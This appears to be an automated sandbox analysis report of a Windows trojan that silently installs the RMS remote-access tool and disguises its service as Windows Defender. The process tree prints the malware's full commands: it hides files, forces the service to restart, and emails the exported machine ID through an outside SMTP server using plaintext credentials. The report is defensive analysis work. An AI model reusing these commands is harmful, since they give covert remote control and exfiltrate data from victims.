Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
03-06-2024 22:19
General
-
Target
92cc670966533412a28905554e3ffd17_JaffaCakes118.exe
-
Size
4.6MB
-
MD5
92cc670966533412a28905554e3ffd17
-
SHA1
811d7fe266fa3412233eb3c03f7261020c22a39a
-
SHA256
6b1993fe3607e7903ec2eb3c28325a33bf9dd7f0e10dced73127d67e59e2c190
-
SHA512
22237b3e13b0957615081faf79e15bc9a1632202273e7754f5fcfb3da0e9c057d107a2b70a5aa5bf7c5572aa31be157e801582dfc4b0ad1a67608c0c462570bf
-
SSDEEP
98304:lKxQ7KQF1iEaGzM038RzYf0ML2x5tTDaLclizt5CZ:lx7KQrLM/RzYI7Da4Ii
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
ASPack v2.12-2.42 2 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 8 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 35 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 7 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\92cc670966533412a28905554e3ffd17_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\92cc670966533412a28905554e3ffd17_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\*.*" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rutserv.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rfusclient.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"4⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /silentinstall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /firewall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /start4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10004⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Windows_Defender v6.3"4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout 1204⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\reg.exereg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"4⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\timeout.exetimeout 104⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\System\mailsend.exemailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user [email protected] -pass Xidgs6dgd8ds -q4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D4⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
-
-
C:\Program Files (x86)\System\rutserv.exe"C:\Program Files (x86)\System\rutserv.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c72b5dc3c2dfd52e041e8192a6c285fc
SHA1c972e668ea60467a0dd745b7d6cd8a4c1f59f80b
SHA2568eaa5b6c5b32c10af614f11c78e3df59949642a06b2062d14edd21cb8cb7a381
SHA512fb4a49306fceffdfadd5b4d58b81fb286d3e867b759b3e90a98a97c7d9ba606c86067ff7e7ef73c72aaafc1cb99912125ecbe7d496b8141816c5f58ed87cf557
-
Filesize
120B
MD5c719a030434d3fa96d62868f27e904a6
SHA1f2f750a752dd1fda8915a47b082af7cf2d3e3655
SHA2562696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f
SHA51247a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0
-
Filesize
1.2MB
MD5ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
Filesize
12KB
MD5251212852a073e6fc5fbe3af92f66adb
SHA16ee07cb20f57830325c11867e68fea49ae0e87ea
SHA256f2c83f4cc13b0cd28090dd128ec5ff221681118f6100eddaead88526070ceecb
SHA512f3853ece99edc6d39edbf1c7bca471e71aa034684a85358b033e50418ffa061f1e8724cba76065048901c20c9f9a6dbd86a17ee33756c0452d4d3358047296be
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
Filesize
20KB
MD5407f58808c922ee10ac579b8887bad69
SHA140daa9facb2b13489e45f1f0b6e0b3bf96eb8845
SHA256d4225f1dd694e7ae613b99a35e351cbfad214c2a528a6ca66fd3584e116780d1
SHA5126f288c59ed0158cd8d3d3041439a6951192f78c441e6682b8829e64fef9c8330a5639fa7142a3e1a30182e7f62db1c202c5f06cc699dae65f6716907f5dee24f
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
6.7MB